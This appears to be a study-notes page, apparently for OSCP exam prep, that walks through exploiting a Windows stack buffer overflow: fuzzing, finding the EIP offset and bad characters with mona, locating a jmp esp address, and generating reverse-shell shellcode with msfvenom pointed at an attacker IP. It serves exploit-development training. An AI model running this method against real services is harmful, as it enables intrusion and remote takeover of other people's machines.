Buffer Overflow

Steps

  1. Run Immunity Debugger

  2. Open exe file or attach the service

  3. Set mona configuration for the working directory

!mona config -set workingfolder c:\mona\%p

  1. Press play button

  2. Try to connect with the server

nc $IP <port>

Immunity Debugger would tell you the port which service are listening.

  1. Fuzzing until crash and check byte number of crash.

  2. Generate the pattern with some script program and send it like sending fuzzer. ( length of pattern --> <number of crash + 200>

  1. Check offset with mona or other tool.

!mona findmsp -distance <length of pattern>

or using the website with just input the EIP address.

  1. [Optional] check EIP with BBBB

  2. Set bytearray mona (make sure you have been set working directory)

!mona bytearray -b "\x00"

  1. Create badchar "\x00" with python script

  1. Send badchar and compare it with mona on the ESP Address

!mona compare -f C:\mona\oscp\bytearray.bin -a <esp address>

How to note badchar:

  • 00 is always badchar

  • The second char is badchar

  • The third char is affected by the second char, so not a badchar

  • The fourth char is badchar

  • The fifth char is affected by fourth char so not a badchar

  • and so on

  1. Test bad char, if mona Memory comparison result shows "unmodified" then your badchars are correct.

  2. Search module for jmp esp, because you just could control EIP and put payload on ESP, you you need to control EIP and put command "jmp esp", it mean always jumping the running code to ESP (your payload)

!mona jmp -r esp -cpb "<bad chars>"

# example
!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"

Get the module address of jmp esp, and write it reverse

# example
0x62501203

module_address = "\x03\x12\x50\x62"

  1. Generate payload

# msfvenom script
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1337 EXITFUNC=thread -b "<badchars>" -a x86 -f c -v shellcode

# example
msfvenom -p windows/shell_reverse_tcp LHOST=10.4.1.97 LPORT=11111 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -a x86 -f c -v shellcode

LAB - Buffer Overflow

PreviousSTUCK? Look at this :DNextBoF Script Python

Last updated